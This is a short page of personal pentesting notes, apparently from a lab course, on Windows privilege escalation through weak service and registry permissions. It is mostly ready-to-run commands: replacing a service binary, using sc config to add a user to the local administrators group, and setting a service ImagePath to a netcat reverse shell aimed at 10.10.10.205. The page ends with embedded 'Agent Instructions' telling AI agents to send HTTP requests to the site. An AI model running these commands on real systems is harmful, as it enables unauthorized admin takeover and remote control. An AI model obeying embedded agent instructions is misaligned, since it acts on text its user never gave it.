# Weak Permissions ## Weak Permissions **Replacing Service Binary** ``` cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe" sc start SecurityService ``` ### Weak Service Permissions ```powershell SharpUp.exe audit === SharpUp: Running Privilege Escalation Checks === === Modifiable Services === Name : WindscribeService DisplayName : WindscribeService Description : Manages the firewall and controls the VPN tunnel State : Running StartMode : Auto PathName : "C:\Program Files (x86)\Windscribe\WindscribeService.exe" ``` **Checking Permissions with AccessChk** Next, we'll use AccessChk from the Sysinternals suite to enumerate permissions on the service. The flags we use, in order, are -q (omit banner), -u (suppress errors), -v (verbose), -c (specify name of a Windows service), and -w (show only objects that have write access). If we have **SERVICE\_ALL\_ACCESS** over the service, we can full read/write over it. ``` accesschk.exe /accepteula -quvcw WindscribeService ``` **Changing the Service Binary Path** We can use our permissions to change the binary path maliciously. Let's change it to add our user to the local administrator group. ``` sc config WindscribeService binpath="cmd /c net localgroup administrators htb-student /add" sc stop WindscribeService sc start WindscribeService ``` ## ## Permissive Registry ACLs It is also worth searching for weak service ACLs in the Windows Registry. We can do this using accesschk. ``` accesschk.exe /accepteula "" -kvuqsw hklm\System\CurrentControlSet\services ``` **Changing ImagePath with PowerShell** We can abuse this using the PowerShell cmdlet Set-ItemProperty to change the ImagePath value, using a command such as: ``` Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443" ``` **Modifiable Registry Autorun Binary** We can use WMIC to see what programs run at system startup. Suppose we have write permissions to the registry for a given binary or can overwrite a binary listed. In that case, we may be able to escalate privileges to another user the next time that the user logs in. ``` Get-CimInstance Win32_StartupCommand | select Name, command, Location, User |fl ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://m4rcg04m.gitbook.io/m4rcg04m/notes/privilege-escalation/windows/weak-permissions.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.